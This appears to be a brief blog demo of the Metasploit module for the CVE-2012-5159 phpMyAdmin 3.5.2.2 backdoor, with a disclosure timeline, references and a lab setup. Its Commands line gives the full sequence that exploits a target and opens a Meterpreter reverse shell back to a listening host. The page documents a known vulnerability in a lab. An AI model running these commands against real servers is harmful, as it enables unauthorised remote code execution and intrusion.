Timeline :
Backdoor discovered by Passerby the 2012-09-25
Backdoor presence vendor notification the 2012-09-25
Metasploit PoC provided the 2012-09-25
PoC provided by :
hdm
Reference(s) :
PMASA-2012-5
CVE-2012-5159
BID-51211
Affected version(s) :
phpMyAdmin-3.5.2.2-all-languages.zip downloaded from cdnetworks-kr-1 SourceForget.net mirror.
Tested on Ubuntu 11.10 i386 with :
phpMyAdmin-3.5.2.2-all-languages.zip
Description :
This module exploits an arbitrary code execution backdoor placed into phpMyAdmin v3.5.2.2 thorugh a compromised SourceForge mirror.
Commands :
use exploit/multi/http/phpmyadmin_3522_backdoor set RHOST 192.168.178.40 set PATH /phpMyAdmin-3.5.2.2-all-languages set PAYLOAD php/meterpreter/reverse_tcp set LHOST 192.168.178.33 exploit sysinfo getuid
1 thought on “CVE-2012-5159 phpMyAdmin 3.5.2.2 server_sync.php Backdoor Metasploit Demo”
Comments are closed.